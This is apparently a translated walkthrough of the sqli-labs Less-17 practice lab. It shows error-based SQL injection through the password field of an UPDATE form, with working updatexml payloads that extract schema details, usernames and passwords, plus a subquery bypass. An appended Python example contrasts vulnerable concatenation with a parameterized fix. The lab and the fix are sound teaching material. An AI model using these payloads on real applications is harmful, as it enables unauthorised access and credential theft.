less-17
Less-17 Update Query- Error based - String
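Judging by the form, it is for creating a new user, which is an update statement, so this should be an injection into an update statement.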
update <table_name> set <column_name=new_value> [where <update_condition>]
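From the update statement it is clear that the injection point should be the password. Submitting uname=admin&passwd=admin' and 1=1--+&submit=Submit produces an error, so error-based injection should be used (the wrong image was placed here).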
Capture the request in Burp, send it to Repeater, and paste the payloads in directly.
# Database
uname=admin&passwd=1233' and (select updatexml(1,concat('~',database()),1))--+&submit=Submit
# Tables
uname=admin&passwd=11223' and (select updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1))--+ &submit=Submit
# Columns
uname=admin&passwd=11223' and (select updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),1))--+ &submit=Submit
Dumping the data
uname=admin&passwd=11223' and (select updatexml(1,concat('~',(select group_concat(username) from users)),1))--+ &submit=Submit
This returns an error:
You can't specify target table 'users' for update in FROM clause
Roughly: you cannot select from a table while you are updating that same table. Wrapping the select in a subquery gets around this.
# Usernames
uname=admin&passwd=11223' and (select updatexml(1,concat('~',(select group_concat(username) from (select * from users) as a)),1))--+ &submit=Submit
# Passwords
uname=admin&passwd=11223' and (select updatexml(1,concat('~',(select group_concat(password) from (select * from users) as a)),1))--+ &submit=Submit
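
Why the passwd field is injectable and what the fix looks like, as an added example (not from the original post or the sqli-labs source). It assumes the reset query has the shape UPDATE users SET password='...' WHERE username='...', uses SQLite as a stand-in for MySQL, and the rows and function names are constructed for illustration. The input is the page's own admin' and 1=1--+ probe with the + decoded to a space.

```python
import sqlite3

# The page's first probe for the passwd field ("+" is a URL-encoded space).
PROBE = "admin' and 1=1-- "

def make_db():
    """In-memory table with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "admin-pw"), ("alice", "alice-pw")])
    return db

def reset_vulnerable(db, uname, passwd):
    """Assumed vulnerable shape: passwd is concatenated into the statement."""
    sql = ("UPDATE users SET password='" + passwd +
           "' WHERE username='" + uname + "'")
    return db.execute(sql).rowcount

def reset_parameterized(db, uname, passwd):
    """Hardened form: values are bound, never parsed as SQL."""
    sql = "UPDATE users SET password=? WHERE username=?"
    return db.execute(sql, (passwd, uname)).rowcount

def passwords(db):
    return dict(db.execute("SELECT username, password FROM users"))

def demo():
    """Run the same input through both forms and report rows touched."""
    bad, good = make_db(), make_db()
    bad_rows = reset_vulnerable(bad, "admin", PROBE)
    good_rows = reset_parameterized(good, "admin", PROBE)
    return {
        # The quote closes the string and "--" comments out the WHERE
        # clause, so the expression is written to every row.
        "vulnerable": (bad_rows, passwords(bad)),
        # The bound value is stored as a literal string for admin only.
        "parameterized": (good_rows, passwords(good)),
    }

if __name__ == "__main__":
    for name, (rows, table) in demo().items():
        print(name, "rows updated:", rows, table)
```
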